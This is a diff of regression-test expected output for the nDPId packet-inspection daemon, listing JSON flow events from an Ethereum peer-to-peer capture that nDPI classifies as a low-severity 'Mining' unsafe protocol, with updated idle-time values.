+00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364654,"flow_last_seen":1578508364729,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365461,"flow_last_seen":1578508365899,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364519,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364421,"flow_last_seen":1578508364694,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 